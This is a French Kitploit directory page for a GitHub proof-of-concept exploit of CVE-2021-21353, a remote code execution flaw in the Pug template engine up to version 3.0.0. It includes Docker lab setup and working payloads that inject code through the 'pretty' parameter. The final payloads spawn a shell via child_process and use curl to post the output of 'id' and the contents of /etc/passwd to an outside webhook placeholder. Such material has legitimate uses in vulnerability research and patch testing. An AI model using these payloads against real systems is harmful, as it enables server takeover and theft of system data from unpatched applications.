Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PUG-RCE-CVE-2021-21353-POC — Exploit de preuve de concept pour CVE-2021-21353, une vulnérabilité d'exécution de code à distance dans le moteur de templates Pug versions <=3.0.0. Démontre l'injection de charge utile via le paramètre 'pretty' pour exécuter des commandes arbitraires. | Kitploit
Outils/GitHubGitHub/jinsu9758/pug-rce-cve-2021-21353-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubjinsu9758/pug-rce-cve-2021-21353-poc

PUG-RCE-CVE-2021-21353-POC

Exploit de preuve de concept pour CVE-2021-21353, une vulnérabilité d'exécution de code à distance dans le moteur de templates Pug versions <=3.0.0. Démontre l'injection de charge utile via le paramètre 'pretty' pour exécuter des commandes arbitraires.

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PUG-RCE (CVE-2021-21353) POC

Informations sur la vulnérabilité

Numéro CVE : cve-2021-21353
Score CVSS : 8.1

< Versions vulnérables >
pug_version <= 3.0.0
2.0.3 < pug-code-gen version, 3.0.0<= pug-code-gen version < 3.0.2


Configuration de l'environnement

git clone https://github.com/jinsu9758/PUG-RCE-CVE-2021-21353-POC.git
cd PUG-RCE-CVE-2021-21353-POC
sudo docker compose up

※ Accessible via le port 3000


Payload

Test du payload
?pretty=');console.log('executed');//

Payload final
?pretty=');process.mainModule.constructor._load('child_process').exec('curl -X POST -d \"$(id)\" <webhook_site>');_=('

?pretty=');process.mainModule.constructor._load('child_process').exec('curl -X POST -d \"$(cat /etc/passwd)\" <webhook_site>');_=('

Télécharger l’outil